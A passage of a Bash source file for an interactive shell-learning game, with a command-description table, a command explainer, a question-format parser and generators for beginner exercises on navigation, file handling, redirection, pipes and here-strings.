  [grub-install]="install GRUB bootloader" [ssh-keygen]="generate SSH key pair"
  [gpg]="GNU Privacy Guard (encrypt/sign)" [vim]="text editor"
  [paste]="merge lines of files" [traceroute]="trace packet route"
  [tracepath]="trace path to host (no root)" [nslookup]="DNS query (legacy, use dig)"
  [free]="show memory usage" [uptime]="system uptime and load"
  [lscpu]="CPU architecture info" [top]="live process viewer"
  [htop]="interactive process viewer" [btop]="modern resource monitor"
  [groups]="show user group memberships"
  [test]="evaluate conditional expression" [export]="set environment variable"
  [wait]="wait for background process" [exit]="exit shell with status"
  [disown]="detach job from shell" [exec]="replace shell with command"
  [unset]="remove variable or function"
  [shuf]="randomize lines" [expand]="convert tabs to spaces"
  [tac]="reverse line order (opposite of cat)" [more]="pager (forward only — use less)"
  [basename]="extract filename from path" [dirname]="extract directory from path"
  [realpath]="resolve path to absolute" [gzip]="compress file (replaces original)"
  [killall]="kill processes by name" [nm]="list symbols from object files"
  [objdump]="display object file info" [nl]="number lines" [stat]="display file metadata"
)
_exp_line() {
  local tok=$1 exp=$2 tcol=$3 _t
  local pad=$((8 - ${#tok})); ((pad < 0)) && pad=0
  local sp; printf -v sp '%*s' "$pad" ''
  if [[ "$exp" == *:* ]]; then
    printf -v _t '  %s%s %s  %s%s\n' "${tcol}${tok}${N}" "$sp" "${D}->${N}" "${Y}${exp%%:*}${D}:${N}" "${W}${exp#*: }${N}"
  else
    printf -v _t '  %s%s %s  %s\n' "${tcol}${tok}${N}" "$sp" "${D}->${N}" "${W}${exp}${N}"
  fi
  _EBUF+=$_t
}
# shellcheck disable=SC2128,SC2178  # _a is a string here, not the nameref array in _fshuffle
_esc_legend() {
  local _a=$1 _leg=""
  [[ "$_a" == *'\n'* ]] && _leg+="${Y}\\n${D}=newline  "
  [[ "$_a" == *'\t'* ]] && _leg+="${Y}\\t${D}=tab  "
  [[ "$_a" == *'\0'* ]] && _leg+="${Y}\\0${D}=null  "
  [[ "$_a" == *'\r'* ]] && _leg+="${Y}\\r${D}=return  "
  if [[ -n "$_leg" ]]; then local _t; printf -v _t '  %s\n' "${D}${_leg%  }${N}"; _EBUF+=$_t; REPLY=1; else REPLY=0; fi
}
explain() {
  local tok n=0 exp tcol cmds=() _ap=1 _t
  _EBUF=""
  printf -v _t '%s\n' "${D}----------------------------------------${N}"; _EBUF+=$_t
  for tok in $1; do
    case "$tok" in '|'|'|&'|'&&'|'||'|';'|'&') _ap=1; continue ;; esac
    ((_ap)) && [[ "$tok" != *=* ]] && { cmds+=("$tok"); _ap=0; }
  done
  local _mc=0 _ml=0
  for tok in "${cmds[@]}"; do
    if [[ -n "${MANPAGE[$tok]:-}" ]]; then
      _mp_show "$tok"; local _tmp="${MANPAGE[$tok]}" _l=0; while [[ "$_tmp" == *$'\n'* ]]; do ((_l++)); _tmp="${_tmp#*$'\n'}"; done; ((_ml += _l + 1))
      ((_mc++))
    elif ((${#cmds[@]} > 1)) && [[ -n "${EXP[$tok]:-}" ]]; then
      printf -v _t "%s %s\n" "${W}${B}${tok}${N}" "${D}- ${EXP[$tok]}${N}"; _EBUF+=$_t; ((_ml++)); ((_mc++))
    fi
  done
  if ((_mc)); then
    for tok in $1; do
      case "$tok" in '>'|'>>'|'<'|'<<<'|'2>'|'&>'|'2>&1'|'>&2'|'1>&2'|'|'|'|&'|'&&'|'||'|';'|'&') ;; *) continue ;; esac
      exp="${EXP[$tok]:-}"; [[ -z "$exp" ]] && continue
      printf -v _t "%s %s\n" "${Y}${B}${tok}${N}" "${D}- ${exp}${N}"; _EBUF+=$_t
      ((_ml++))
    done
    _esc_legend "$1"; ((_ml += REPLY))
    printf -v _t '%s\n' "${D}----------------------------------------${N}"; _EBUF+=$_t
    _EXP_LINES=$((_ml + 2))
    [[ -z "${2:-}" ]] && printf '%s' "$_EBUF"
    return
  fi
  local _cp=1  # command position: 1=expecting command, 0=in arguments
  for tok in $1; do
    case "$tok" in '|'|'|&'|'&&'|'||'|';'|'&') _cp=1 ;; esac
    exp="${EXP[$tok]:-}"
    if [[ -n "$exp" ]]; then
      if ((!_cp)); then
        case "$tok" in
          -*|'>'|'>>'|'<'|'<<<'|'2>'|'&>'|'2>&1'|'>&2'|'1>&2'|'|'|'|&'|'&&'|'||'|';'|'&') ;;
          *) continue ;;
        esac
      fi
      tcol="${G}"
      case "$tok" in
        .|..|~|/*) tcol="${W}" ;;
        '>'|'>>'|'<'|'<<<'|'2>'|'&>'|'2>&1'|'|'|'|&') tcol="${Y}" ;;
        '&&'|'||'|';'|'&') tcol="${Y}" ;;
        -*) tcol="${C}" ;;
      esac

      _exp_line "$tok" "$exp" "$tcol"
      ((++n))
    fi
    case "$tok" in '|'|'|&'|'&&'|'||'|';'|'&'|'>'|'>>'|'<'|'<<<'|'2>'|'&>'|'2>&1') ;; *) _cp=0 ;; esac
  done
  if ((n == 0)); then printf -v _t '  %s\n' "${Y}$1${N}"; _EBUF+=$_t; ((++n)); fi
  _esc_legend "$1"; ((n += REPLY))
  printf -v _t '%s\n' "${D}----------------------------------------${N}"; _EBUF+=$_t
  _EXP_LINES=$((n + 2))
  [[ -z "${2:-}" ]] && printf '%s' "$_EBUF"
}

# ═══ QUESTION DSL ═══
# Question DSL format:
#   prompt|answer1|answer2|...|#output:PATTERN#state:CHECKS#text:
#   prompt§answer1§answer2§...§#output:PATTERN#state:CHECKS#text:
#
# Use § when answers contain pipes (e.g. "grep foo | wc -l")
# Use | for simple answers (e.g. "pwd")
#
# Sandbox markers (appended after answers):
#   #output:TEXT     exact stdout match
#   #output:~REGEX   stdout regex match
#   #output:@N       stdout must be exactly N lines
#   #state:CHECKS    comma-separated: exists:F, !exists:F, contains:F:S,
#                    !contains:F:S, lines:F:N, perm:F:M, !perm:F:M
#   #require:STRING  input must contain STRING (prevents shortcut cheats)
#   #text:           command is interactive (less/vi) — skip sandbox exec
#
# Level generators use nameref: local -n questions=${1:-CURRENT_QUESTIONS}; questions=(); eval "local $_QV"; _ctx
#   $_QV declares ~40 local vars, _ctx() populates them via _fpick from pools
_qparse() {
  local q=$1
  _qoutput="" _qstate="" _qtext=0 _qrequire="" _qdelim='|'

  if [[ $q == *"#text:"* ]]; then
    _qtext=1
    q="${q%%#text:*}"
  fi
  if [[ $q == *"#state:"* ]]; then
    _qstate="${q##*#state:}"
    _qstate="${_qstate%%#*}"
    q="${q%%#state:*}"
  fi
  if [[ $q == *"#output:"* ]]; then
    _qoutput="${q##*#output:}"
    _qoutput="${_qoutput%%#*}"  # Remove any trailing markers
    q="${q%%#output:*}"
  fi
  if [[ $q == *"#require:"* ]]; then
    _qrequire="${q##*#require:}"
    _qrequire="${_qrequire%%#*}"
    q="${q%%#require:*}"
  fi

  if [[ $q == *§* ]]; then
    _qdelim='§'
    _qprompt="${q%%§*}"; _qanswers="${q#*§}"; _qans="${_qanswers%%§*}"
  else
    _qdelim='|'
    _qprompt="${q%%|*}"; _qanswers="${q#*|}"; _qans="${_qanswers%%|*}"
  fi
}

_apply_opts() { VI_MODE=${CMD_VI:-$OPT_VI}; }  # env var overrides profile
_apply_opts

# ═══ LEVEL GENERATORS ═══

# Level 1: First Commands (pwd, ls, echo, cd)
gen_level1() {
  local -n questions=${1:-CURRENT_QUESTIONS}; questions=(); eval "local $_QV"; _ctx; local word num
  _fphrase src data logs; dir=$REPLY; _fphrase backup temp config test; dir2=$REPLY
  _fphrase projects demos tools assets; local newdir=$REPLY
  _fphrase hello ready "done" test ping; word=$REPLY; num=$((RANDOM % 50 + 1))
  _fphrase "Print" "Show" "Display"; questions+=("${REPLY} current directory|pwd|#output:~^/sandbox")
  _fphrase "Where am I" "What directory" "Current path"; questions+=("${REPLY}?|pwd|#output:~^/")
  _fphrase "List" "Show"; questions+=("${REPLY} files in current directory|ls|#output:~server.log")
  _fphrase "all files" "files"; questions+=("List ${REPLY} including hidden|ls -a|ls --all|#output:~\\.\\.")
  _fphrase "details" "permissions" "long format"; questions+=("List files with ${REPLY}|ls -l|#output:~^total")
  local _dir_pat; case "$dir" in src) _dir_pat="utils" ;; data) _dir_pat="export" ;; logs) _dir_pat="access" ;; *) _dir_pat="." ;; esac
  questions+=("List files in ${W}${dir}${C} directory|ls ${dir}|ls ${dir}/|#output:~${_dir_pat}")
  questions+=("List ${W}${dir}${C} with details|ls -l ${dir}|ls -l ${dir}/|#output:~^total")
  questions+=("Print ${Y}hello world${C}|echo hello world|echo 'hello world'|echo \"hello world\"|#output:hello world")
  questions+=("Print ${Y}${word}${C}|echo ${word}|#output:${word}")
  questions+=("Print your username using ${Y}\$USER${C}|echo \$USER|echo \${USER}|echo \"\$USER\"|echo \"\${USER}\"|#output:sandbox")
  questions+=("Print your home directory using ${Y}\$HOME${C}|echo \$HOME|echo \${HOME}|echo \"\$HOME\"|echo \"\${HOME}\"|#output:~/sandbox")
  questions+=("Print current shell using ${Y}\$SHELL${C}|echo \$SHELL|echo \${SHELL}|echo \"\$SHELL\"|echo \"\${SHELL}\"|#output:~sh")
  questions+=("Print the number ${Y}${num}${C}|echo ${num}|#output:${num}")
  questions+=("Print: ${Y}${word} ${word} ${word}${C}|echo ${word} ${word} ${word}|#output:${word} ${word} ${word}")
  _fphrase "Change to" "Go to" "Enter"; questions+=("${REPLY} ${W}${dir}${C} directory|cd ${dir}|cd ${dir}/|cd ./${dir}|cd ./${dir}/")
  _fphrase "Change to" "Go to"; questions+=("${REPLY} ${W}${dir2}${C}|cd ${dir2}|cd ${dir2}/|cd ./${dir2}|cd ./${dir2}/")
  questions+=("Go to home directory|cd|cd ~|cd ~/|cd \$HOME|cd \$HOME/|cd \${HOME}|cd \${HOME}/")
  questions+=("Go up one directory|cd ..|cd ../")
  questions+=("Go up two directories|cd ../..|cd ../../")
  questions+=("Go to filesystem root (/)|cd /")
  questions+=("Create directory ${W}${newdir}${C}|mkdir ${newdir}|mkdir -p ${newdir}|mkdir --parents ${newdir}|mkdir ${newdir}/|mkdir -p ${newdir}/|mkdir --parents ${newdir}/")
  questions+=("Create nested directories ${W}${dir}/${newdir}${C} (parents too)|mkdir -p ${dir}/${newdir}|mkdir --parents ${dir}/${newdir}|mkdir -p ${dir}/${newdir}/|mkdir --parents ${dir}/${newdir}/")
  _fphrase output.txt temp.txt scratch.txt; local newfile=$REPLY
  questions+=("Create empty file ${W}${newfile}${C}|touch ${newfile}|> ${newfile}|: > ${newfile}|#state:exists:${newfile}")
  questions+=("Update timestamp of ${W}${txt}${C}|touch ${txt}")
  _fpick SANDBOX_TXTS; local rmfile=$REPLY
  questions+=("Delete ${W}${rmfile}${C}|rm ${rmfile}|rm -f ${rmfile}|rm -- ${rmfile}")
  questions+=("Delete ${W}${dir2}${C} and everything in it|rm -r ${dir2}|rm -rf ${dir2}|rm -r ${dir2}/|rm -rf ${dir2}/|rm --recursive ${dir2}|rm --recursive --force ${dir2}")
  questions+=("Remove empty directory ${W}${newdir}${C}|rmdir ${newdir}|rmdir ${newdir}/|rm -d ${newdir}|rm -d ${newdir}/")
}

# Level 2: File Basics (cp, mv)
gen_level2() {
  local -n questions=${1:-CURRENT_QUESTIONS}; questions=(); eval "local $_QV"; _ctx
  [[ "$cfg2" == "$cfg" ]] && { _fpick CONFIGS; cfg2=$REPLY; }
  [[ "$txt2" == "$txt" ]] && { _fpick TXTS; txt2=$REPLY; }
  questions+=("Copy ${W}${cfg}${C} to ${W}${cfg2}${C}|cp ${cfg} ${cfg2}|cp -- ${cfg} ${cfg2}")
  questions+=("Copy ${W}${txt}${C} to ${W}${dir}${C}/|cp ${txt} ${dir}/|cp ${txt} ${dir}|cp -- ${txt} ${dir}/|cp -- ${txt} ${dir}")
  questions+=("Copy ${W}${dir}${C}/ recursively to ${W}${dir2}${C}/|cp -r ${dir}/ ${dir2}/|cp -r ${dir} ${dir2}|cp -R ${dir}/ ${dir2}/|cp -R ${dir} ${dir2}|cp --recursive ${dir}/ ${dir2}/|cp --recursive ${dir} ${dir2}|cp -a ${dir}/ ${dir2}/|cp -a ${dir} ${dir2}|cp --archive ${dir}/ ${dir2}/|cp --archive ${dir} ${dir2}")
  questions+=("Copy ${W}${cfg}${C} to ${W}${cfg}.bak${C}|cp ${cfg} ${cfg}.bak|cp -- ${cfg} ${cfg}.bak")
  questions+=("Copy ${W}${cfg}${C}, confirm before overwriting|cp -i ${cfg} ${cfg2}|cp --interactive ${cfg} ${cfg2}")
  questions+=("Move ${W}${txt}${C} to ${W}${dir}${C}/|mv ${txt} ${dir}/|mv ${txt} ${dir}|mv -- ${txt} ${dir}/|mv -- ${txt} ${dir}")
  questions+=("Rename ${W}${cfg}${C} to ${W}${cfg2}${C}|mv ${cfg} ${cfg2}|mv -- ${cfg} ${cfg2}")
  questions+=("Move ${W}${txt}${C} without overwriting|mv -n ${txt} ${dir}/|mv --no-clobber ${txt} ${dir}/|mv -n ${txt} ${dir}|mv --no-clobber ${txt} ${dir}")
  questions+=("Move ${W}${txt}${C}, confirm before overwriting|mv -i ${txt} ${dir}/|mv --interactive ${txt} ${dir}/|mv -i ${txt} ${dir}|mv --interactive ${txt} ${dir}")
  questions+=("Copy ${W}${cfg}${C} without overwriting|cp -n ${cfg} ${cfg2}|cp --no-clobber ${cfg} ${cfg2}")
}

# Level 3: Save Output (>, >>)
gen_level3() {
  local -n questions=${1:-CURRENT_QUESTIONS}; questions=(); eval "local $_QV"; _ctx; local word word2 outfile outfile2 num
  _fpick SANDBOX_LOGS; log=$REPLY; _fpick SANDBOX_TXTS; txt=$REPLY; _fpick SANDBOX_CFGS; cfg=$REPLY
  _fphrase hello "done" ready complete finished saved started stopped; word=$REPLY
  _fphrase entry note line record message update backup; word2=$REPLY
  _fphrase output.txt files.txt list.txt result.txt; outfile=$REPLY
  _fphrase report.txt data.txt dump.txt export.txt; outfile2=$REPLY
  num=$((RANDOM % 100 + 1))
  questions+=("Write '${word}' to ${W}${txt}${C}, overwriting it|echo ${word} > ${txt}|echo '${word}' > ${txt}|echo \"${word}\" > ${txt}|printf '%s\n' ${word} > ${txt}|printf '%s\n' '${word}' > ${txt}|printf '%s\n' \"${word}\" > ${txt}|#state:contains:${txt}:${word},lines:${txt}:1")
  questions+=("Append '${word2}' to the end of ${W}${log}${C}|echo ${word2} >> ${log}|echo '${word2}' >> ${log}|echo \"${word2}\" >> ${log}|printf '%s\n' ${word2} >> ${log}|printf '%s\n' '${word2}' >> ${log}|printf '%s\n' \"${word2}\" >> ${log}|#state:contains:${log}:${word2},contains:${log}:[")
  questions+=("Save ls output to ${W}${outfile}${C}, overwriting it|ls > ${outfile}|ls -1 > ${outfile}|#state:exists:${outfile}")
  questions+=("Append a timestamp to ${W}${log}${C}|date >> ${log}")
  questions+=("Save whoami output to ${W}${outfile}${C}, overwriting it|whoami > ${outfile}|id -un > ${outfile}")
  questions+=("Append hostname to ${W}${log}${C}|hostname >> ${log}|uname -n >> ${log}")
  questions+=("Create empty file ${W}${outfile2}${C}|touch ${outfile2}|> ${outfile2}|: > ${outfile2}|>> ${outfile2}|#state:exists:${outfile2}")
  questions+=("Echo '${word}' to screen AND save to ${W}${txt}${C}§echo ${word} | tee ${txt}§#output:${word}#state:contains:${txt}:${word}")
  questions+=("Echo '${word2}' to screen AND append to ${W}${log}${C}§echo ${word2} | tee -a ${log}§echo ${word2} | tee --append ${log}§#output:${word2}#state:contains:${log}:${word2}")
  questions+=("Run ls, show output AND save to ${W}${outfile}${C}§ls | tee ${outfile}§#output:~server.log#state:contains:${outfile}:server.log")
}

# Level 4: Read Files (cat, head, tail)
gen_level4() {
  local -n questions=${1:-CURRENT_QUESTIONS}; questions=(); eval "local $_QV"; _ctx
  _fpick SANDBOX_LOGS; log=$REPLY
  _fpick SANDBOX_TXTS; txt=$REPLY; _fpick SANDBOX_TXTS; txt2=$REPLY
  _fpick SANDBOX_CFGS; cfg=$REPLY; _fpick SANDBOX_CFGS; cfg2=$REPLY
  n=$((RANDOM % 6 + 3)); n2=$((RANDOM % 5 + 2)); n3=$((RANDOM % 8 + 5))
  local _cat_lc; case "$txt" in notes.txt) _cat_lc=29 ;; todo.txt) _cat_lc=11 ;; *) _cat_lc=1 ;; esac
  questions+=("Display entire ${W}${txt}${C}|cat ${txt}|cat < ${txt}|#output:@${_cat_lc}")
  questions+=("Display ${W}${cfg}${C} with line numbers|cat -n ${cfg}|cat --number ${cfg}|nl -ba ${cfg}|nl --body-numbering=a ${cfg}|#output:~^\\s+1")
  questions+=("First ${n} lines of ${W}${log}${C}|head -${n} ${log}|head -n ${n} ${log}|head --lines ${n} ${log}|head --lines=${n} ${log}")
  questions+=("First 10 lines of ${W}${cfg}${C}|head ${cfg}|head -10 ${cfg}|head -n 10 ${cfg}|head --lines 10 ${cfg}|head --lines=10 ${cfg}")
  questions+=("First line only of ${W}${log}${C}|head -1 ${log}|head -n 1 ${log}|head --lines 1 ${log}|head --lines=1 ${log}")
  questions+=("Last ${n2} lines of ${W}${txt}${C}|tail -${n2} ${txt}|tail -n ${n2} ${txt}|tail --lines ${n2} ${txt}|tail --lines=${n2} ${txt}")
  questions+=("Last 10 lines of ${W}${log}${C}|tail ${log}|tail -10 ${log}|tail -n 10 ${log}|tail --lines 10 ${log}|tail --lines=10 ${log}")
  questions+=("Last line only of ${W}${txt}${C}|tail -1 ${txt}|tail -n 1 ${txt}|tail --lines 1 ${txt}|tail --lines=1 ${txt}")
  questions+=("Page through ${W}${log}${C} interactively|less ${log}|more ${log}|#text:")
  questions+=("View ${W}${txt}${C} with line numbers in a pager|less -N ${txt}|less --LINE-NUMBERS ${txt}|#text:")
}

# Level 5: Basic Pipes (|)
gen_level5() {
  local -n questions=${1:-CURRENT_QUESTIONS}; questions=(); eval "local $_QV"; _ctx; local term1
  n=$((RANDOM % 5 + 3)); n2=$((RANDOM % 4 + 2)); n3=$((RANDOM % 6 + 5))
  _fpick SANDBOX_LOGS; log=$REPLY
  _fpick SANDBOX_TXTS; txt=$REPLY; _fpick SANDBOX_TXTS; txt2=$REPLY
  _fpick SANDBOX_CFGS; cfg=$REPLY; _fpick SANDBOX_CFGS; cfg2=$REPLY
  _fpick SANDBOX_CSVS; csv=$REPLY
  local _log_type="app"
  [[ $log == server.log || $log == logs/access.log ]] && _log_type="nginx"
  if [[ $_log_type == "nginx" ]]; then
    _fphrase GET POST 200 404 500; term1=$REPLY
  else
    _fphrase ERROR WARN INFO DEBUG; term1=$REPLY
  fi
  if [[ $txt == todo.txt ]]; then
    _fphrase Review Deploy Update; term2=$REPLY
  else
    _fphrase TODO Review Deploy Update Schedule; term2=$REPLY
  fi
  _fphrase server database logging cache host port localhost info enabled; term3=$REPLY
  questions+=("Count items in current directory (pipe ${Y}ls${C} to ${Y}wc${C})§ls | wc -l§ls -1 | wc -l§ls | wc --lines§ls -1 | wc --lines")
  _fphrase "Search for" "Find"; questions+=("${REPLY} ${Y}${term1}${C} in ${W}${log}${C}§grep ${term1} ${log}§cat ${log} | grep ${term1}§#output:~${term1}")
  questions+=("Find ${Y}${term2}${C} in ${W}${txt}${C}§grep ${term2} ${txt}§cat ${txt} | grep ${term2}§#output:~${term2}")
  questions+=("Search ${W}${cfg}${C} for ${Y}${term3}${C}§grep ${term3} ${cfg}§cat ${cfg} | grep ${term3}§#output:~${term3}")
  questions+=("Count ${Y}${term2}${C} matches in ${W}${txt}${C}§grep -c ${term2} ${txt}§grep --count ${term2} ${txt}§grep ${term2} ${txt} | wc -l§grep ${term2} ${txt} | wc --lines§cat ${txt} | grep -c ${term2}§cat ${txt} | grep --count ${term2}§cat ${txt} | grep ${term2} | wc -l")
  questions+=("Count ${Y}${term1}${C} occurrences in ${W}${log}${C}§grep -c ${term1} ${log}§grep --count ${term1} ${log}§grep ${term1} ${log} | wc -l§grep ${term1} ${log} | wc --lines§cat ${log} | grep -c ${term1}§cat ${log} | grep --count ${term1}§cat ${log} | grep ${term1} | wc -l")
  questions+=("Find ${Y}${term1}${C} case-insensitive in ${W}${log}${C}§grep -i ${term1} ${log}§grep --ignore-case ${term1} ${log}§cat ${log} | grep -i ${term1}§cat ${log} | grep --ignore-case ${term1}")
  questions+=("Search ${W}${txt}${C} for ${Y}${term2}${C} ignoring case§grep -i ${term2} ${txt}§grep --ignore-case ${term2} ${txt}§cat ${txt} | grep -i ${term2}§cat ${txt} | grep --ignore-case ${term2}")
  questions+=("Show lines NOT containing ${Y}${term1}${C} in ${W}${log}${C}§grep -v ${term1} ${log}§grep --invert-match ${term1} ${log}§cat ${log} | grep -v ${term1}§cat ${log} | grep --invert-match ${term1}")
  questions+=("Exclude ${Y}${term2}${C} lines from ${W}${txt}${C}§grep -v ${term2} ${txt}§grep --invert-match ${term2} ${txt}§cat ${txt} | grep -v ${term2}§cat ${txt} | grep --invert-match ${term2}")
  questions+=("Sort ${W}${txt}${C} alphabetically§sort ${txt}§cat ${txt} | sort")
  questions+=("Sort ${W}${cfg}${C} in reverse§sort -r ${cfg}§sort --reverse ${cfg}§cat ${cfg} | sort -r§cat ${cfg} | sort --reverse")
  questions+=("Sort ${W}${csv}${C} numerically§sort -n ${csv}§sort --numeric-sort ${csv}§cat ${csv} | sort -n§cat ${csv} | sort --numeric-sort")
  questions+=("Sort ${W}${txt2}${C} and remove duplicates§sort ${txt2} | uniq§sort -u ${txt2}§sort --unique ${txt2}§cat ${txt2} | sort | uniq§cat ${txt2} | sort -u§cat ${txt2} | sort --unique")
  questions+=("Sort ${W}${csv}${C} by second column§sort -t, -k2 ${csv}§sort --field-separator=, -k2 ${csv}§sort -t, --key=2 ${csv}§sort --field-separator=, --key=2 ${csv}")
  questions+=("First ${n} ${Y}${term1}${C} matches in ${W}${log}${C}§grep ${term1} ${log} | head -${n}§grep ${term1} ${log} | head -n ${n}§grep ${term1} ${log} | head --lines=${n}§grep ${term1} ${log} | head --lines ${n}§grep -m ${n} ${term1} ${log}§grep --max-count ${n} ${term1} ${log}§grep --max-count=${n} ${term1} ${log}§cat ${log} | grep ${term1} | head -${n}§cat ${log} | grep ${term1} | head -n ${n}§cat ${log} | grep -m ${n} ${term1}§#output:~${term1}")
  questions+=("Last ${n2} ${Y}${term1}${C} lines in ${W}${log}${C}§grep ${term1} ${log} | tail -${n2}§grep ${term1} ${log} | tail -n ${n2}§grep ${term1} ${log} | tail --lines=${n2}§grep ${term1} ${log} | tail --lines ${n2}§cat ${log} | grep ${term1} | tail -${n2}§cat ${log} | grep ${term1} | tail -n ${n2}§#output:~${term1}")
  questions+=("Count unique lines in ${W}${txt}${C}§sort ${txt} | uniq | wc -l§sort ${txt} | uniq | wc --lines§sort -u ${txt} | wc -l§sort -u ${txt} | wc --lines§sort --unique ${txt} | wc -l§sort --unique ${txt} | wc --lines§cat ${txt} | sort | uniq | wc -l§cat ${txt} | sort -u | wc -l")
  questions+=("Sort ${W}${log}${C} and show first ${n}§sort ${log} | head -${n}§sort ${log} | head -n ${n}§sort ${log} | head --lines=${n}§sort ${log} | head --lines ${n}§cat ${log} | sort | head -${n}§cat ${log} | sort | head -n ${n}")
  questions+=("Show last ${n2} sorted lines of ${W}${cfg}${C}§sort ${cfg} | tail -${n2}§sort ${cfg} | tail -n ${n2}§sort ${cfg} | tail --lines=${n2}§sort ${cfg} | tail --lines ${n2}§cat ${cfg} | sort | tail -${n2}§cat ${cfg} | sort | tail -n ${n2}")
  questions+=("Find ${Y}${term1}${C} lines, then count them in ${W}${log}${C}§grep ${term1} ${log} | wc -l§grep ${term1} ${log} | wc --lines§grep -c ${term1} ${log}§grep --count ${term1} ${log}§cat ${log} | grep ${term1} | wc -l§cat ${log} | grep -c ${term1}§cat ${log} | grep --count ${term1}")
}

# Level 6: Input & Here-Strings (<, <<<)
gen_level6() {
  local -n questions=${1:-CURRENT_QUESTIONS}; questions=(); eval "local $_QV"; _ctx
  _fpick SANDBOX_TXTS; txt=$REPLY
  _fpick SANDBOX_CSVS; csv=$REPLY; _fpick SANDBOX_LOGS; log=$REPLY
  local n=$((RANDOM % 6 + 3))
  # Input redirection (<)
  questions+=("Count lines in ${W}${csv}${C} — just the number, no filename|wc -l < ${csv}|wc --lines < ${csv}")
  questions+=("Count words in ${W}${txt}${C} — just the number, no filename|wc -w < ${txt}|wc --words < ${txt}")
  questions+=("Uppercase contents of ${W}${txt}${C} using tr|tr a-z A-Z < ${txt}|tr '[:lower:]' '[:upper:]' < ${txt}")
  questions+=("Collapse repeated newlines in ${W}${log}${C} using tr|tr -s '\\n' < ${log}|tr --squeeze-repeats '\\n' < ${log}")
  questions+=("Sort ${W}${csv}${C} using input redirection|sort < ${csv}")
  questions+=("Reverse each line (flip characters) of ${W}${txt}${C} using input redirection|rev < ${txt}")
  questions+=("Shuffle lines of ${W}${csv}${C} randomly using redirection|shuf < ${csv}")
  questions+=("Show first ${n} lines of ${W}${log}${C} using redirection|head -${n} < ${log}|head -n ${n} < ${log}|head --lines ${n} < ${log}|head --lines=${n} < ${log}")
  questions+=("Display ${W}${txt}${C} using input redirection|cat < ${txt}")
  questions+=("Sort ${W}${csv}${C} and save output to ${W}sorted.csv${C}|sort < ${csv} > sorted.csv|sort ${csv} > sorted.csv|sort > sorted.csv < ${csv}|#state:exists:sorted.csv")
  questions+=("Show last ${n} lines of ${W}${log}${C} using redirection|tail -${n} < ${log}|tail -n ${n} < ${log}|tail --lines ${n} < ${log}|tail --lines=${n} < ${log}")
  questions+=("Count bytes in ${W}${txt}${C} — just the number|wc -c < ${txt}|wc --bytes < ${txt}")
  # Here-strings (<<<)
  local word word2
  _fphrase hello world example config backup server admin debug; word=$REPLY
  _fphrase test data input query search token ready active; word2=$REPLY
  local num1=$((RANDOM % 50 + 10)) num2=$((RANDOM % 20 + 5))
  questions+=("Uppercase the string ${Y}'${word}'${C} directly§tr a-z A-Z <<< '${word}'§tr a-z A-Z <<< ${word}§tr '[:lower:]' '[:upper:]' <<< '${word}'§tr '[:lower:]' '[:upper:]' <<< ${word}§echo '${word}' | tr a-z A-Z§echo ${word} | tr a-z A-Z§echo '${word}' | tr '[:lower:]' '[:upper:]'§echo ${word} | tr '[:lower:]' '[:upper:]'§#output:${word^^}")
  questions+=("Lowercase the string ${Y}'${word2^^}'${C} directly§tr A-Z a-z <<< '${word2^^}'§tr A-Z a-z <<< ${word2^^}§tr '[:upper:]' '[:lower:]' <<< '${word2^^}'§tr '[:upper:]' '[:lower:]' <<< ${word2^^}§echo '${word2^^}' | tr A-Z a-z§echo ${word2^^} | tr A-Z a-z§echo '${word2^^}' | tr '[:upper:]' '[:lower:]'§echo ${word2^^} | tr '[:upper:]' '[:lower:]'§#output:${word2}")
  local _rw="" _rw2="" _i; for ((_i=${#word}-1;_i>=0;_i--)); do _rw+="${word:_i:1}"; done
  for ((_i=${#word2}-1;_i>=0;_i--)); do _rw2+="${word2:_i:1}"; done
  questions+=("Reverse the string ${Y}'${word}'${C}§rev <<< '${word}'§rev <<< ${word}§echo '${word}' | rev§echo ${word} | rev§#output:~${_rw}")
  questions+=("Reverse the string ${Y}'${word2}'${C}§rev <<< '${word2}'§rev <<< ${word2}§echo '${word2}' | rev§echo ${word2} | rev§#output:~${_rw2}")
  command -v bc &>/dev/null && questions+=("Calculate ${Y}${num1}+${num2}${C} with bc§bc <<< '${num1}+${num2}'§bc <<< ${num1}+${num2}§echo '${num1}+${num2}' | bc§echo ${num1}+${num2} | bc§#require:${num1}+${num2}#output:~^$((num1+num2))$")
  questions+=("Extract home dir from ${Y}'root:x:0:0:root:/root:/bin/bash'${C}§cut -d: -f6 <<< 'root:x:0:0:root:/root:/bin/bash'§cut --delimiter=: --fields=6 <<< 'root:x:0:0:root:/root:/bin/bash'§echo 'root:x:0:0:root:/root:/bin/bash' | cut -d: -f6§echo 'root:x:0:0:root:/root:/bin/bash' | cut --delimiter=: --fields=6§awk -F: '{print \$6}' <<< 'root:x:0:0:root:/root:/bin/bash'§echo 'root:x:0:0:root:/root:/bin/bash' | awk -F: '{print \$6}'§#require:root:x:0:0:root:/root:/bin/bash#output:~^/root$")
  questions+=("Get the login name (field 1) from ${Y}'john:x:1000:1000:John:/home/john:/bin/bash'${C}§cut -d: -f1 <<< 'john:x:1000:1000:John:/home/john:/bin/bash'§cut --delimiter=: --fields=1 <<< 'john:x:1000:1000:John:/home/john:/bin/bash'§echo 'john:x:1000:1000:John:/home/john:/bin/bash' | cut -d: -f1§echo 'john:x:1000:1000:John:/home/john:/bin/bash' | cut --delimiter=: --fields=1§awk -F: '{print \$1}' <<< 'john:x:1000:1000:John:/home/john:/bin/bash'§echo 'john:x:1000:1000:John:/home/john:/bin/bash' | awk -F: '{print \$1}'§#require:john:x:1000:1000:John:/home/john:/bin/bash#output:~^john$")
  questions+=("Count words in ${Y}'${word} ${word2} test'${C}§wc -w <<< '${word} ${word2} test'§wc --words <<< '${word} ${word2} test'§echo '${word} ${word2} test' | wc -w§echo '${word} ${word2} test' | wc --words§#require:${word} ${word2} test#output:~^\\s*3$")
  questions+=("Count bytes in the string ${Y}'${word}'${C}§wc -c <<< '${word}'§wc -c <<< ${word}§wc --bytes <<< '${word}'§wc --bytes <<< ${word}§echo '${word}' | wc -c§echo ${word} | wc -c§echo '${word}' | wc --bytes§echo ${word} | wc --bytes§#require:${word}#output:~^\\s*$((${#word}+1))$")
  questions+=("Replace spaces with underscores in ${Y}'hello world test'${C}§tr ' ' '_' <<< 'hello world test'§echo 'hello world test' | tr ' ' '_'§sed 's/ /_/g' <<< 'hello world test'§echo 'hello world test' | sed 's/ /_/g'§#require:hello world test#output:~hello_world_test")
